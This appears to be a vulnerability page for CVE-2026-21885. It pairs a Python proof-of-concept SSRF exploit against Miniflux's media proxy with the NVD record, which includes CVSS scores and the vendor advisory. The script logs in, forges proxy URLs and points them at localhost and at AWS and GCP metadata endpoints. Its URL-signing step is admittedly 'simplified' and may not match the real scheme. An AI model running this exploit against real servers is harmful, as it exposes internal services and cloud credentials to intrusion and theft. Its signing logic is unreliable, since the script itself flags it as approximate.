CVE-2026-21885

#!/usr/bin/env python3 """ CVE-2026-21885 Miniflux SSRF PoC Target: Miniflux < 2.2.16 Type: Server-Side Request Forgery via media proxy endpoint """ import requests import hashlib import base64 import urllib.parse # Configuration TARGET_URL = "http://target-miniflux-server.com" # Replace with target USERNAME = "attacker" PASSWORD = "password" def get_auth_token(): """Login to Miniflux and get session token""" login_url = f"{TARGET_URL}/login" session = requests.Session() response = session.get(login_url) login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data, allow_redirects=False) return session def generate_proxy_url(session, target_url): """ Generate signed proxy URL for the target URL The signature is based on digest of the URL """ # Encode target URL encoded_url = base64.urlsafe_b64encode(target_url.encode()).decode().rstrip('=') # Generate digest (simplified - actual implementation may vary) digest = hashlib.sha256(target_url.encode()).hexdigest()[:16] encoded_digest = base64.urlsafe_b64encode(digest.encode()).decode().rstrip('=') proxy_url = f"{TARGET_URL}/proxy/{encoded_digest}/{encoded_url}" return proxy_url def exploit_ssrf(session, internal_target): """Execute SSRF attack against internal target""" proxy_url = generate_proxy_url(session, internal_target) print(f"[*] Target internal URL: {internal_target}") print(f"[*] Proxy URL: {proxy_url}") try: response = session.get(proxy_url, timeout=10) print(f"[*] Status: {response.status_code}") print(f"[*] Response length: {len(response.content)} bytes") if response.status_code == 200: print(f"[+] Success! Response preview:") print(response.text[:500]) return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def main(): print("="*60) print("CVE-2026-21885 Miniflux SSRF Exploitation") print("="*60) # Login to get authenticated session session = get_auth_token() # Target internal resources internal_targets = [ "http://127.0.0.1:8080/", # Localhost "http://localhost:80/", # Local HTTP "http://169.254.169.254/latest/meta-data/", # AWS metadata "http://metadata.google.internal/computeMetadata/v1/", # GCP metadata ] for target in internal_targets: print(f"\n[*] Testing: {target}") exploit_ssrf(session, target) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-21885", "sourceIdentifier": "[email protected]", "published": "2026-01-08T14:15:57.257", "lastModified": "2026-01-12T16:55:42.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Miniflux 2 is an open source feed reader. Prior to version 2.2.16, Miniflux's media proxy endpoint (`GET /proxy/{encodedDigest}/{encodedURL}`) can be abused to perform Server-Side Request Forgery (SSRF). An authenticated user can cause Miniflux to generate a signed proxy URL for attacker-chosen media URLs embedded in feed entry content, including internal addresses (e.g., localhost, private RFC1918 ranges, or link-local metadata endpoints). Requesting the resulting `/proxy/...` URL makes Miniflux fetch and return the internal response. Version 2.2.16 fixes the issue."}, {"lang": "es", "value": "Miniflux 2 es un lector de feeds de código abierto. Antes de la versión 2.2.16, el endpoint de proxy de medios de Miniflux ('GET /proxy/{encodedDigest}/{encodedURL}') puede ser abusado para realizar Falsificación de Petición del Lado del Servidor (SSRF). Un usuario autenticado puede hacer que Miniflux genere una URL de proxy firmada para URLs de medios elegidas por el atacante incrustadas en el contenido de la entrada del feed, incluyendo direcciones internas (p. ej., localhost, rangos privados RFC1918 o endpoints de metadatos de enlace local). Solicitar la URL resultante '/proxy/...' hace que Miniflux obtenga y devuelva la respuesta interna. La versión 2.2.16 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:miniflux_project:miniflux:*:*:*:*:*:go:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.2.16", "matchCriteriaId": "145FED28-3379-45DD-B388-01F5ADF6A766"}]}]}], "references": [{"url": "https://github.com/miniflux/v2/security/advisories/GHSA-xwh2-742g-w3wp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/miniflux/v2/security/advisories/GHSA-xwh2-742g-w3wp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}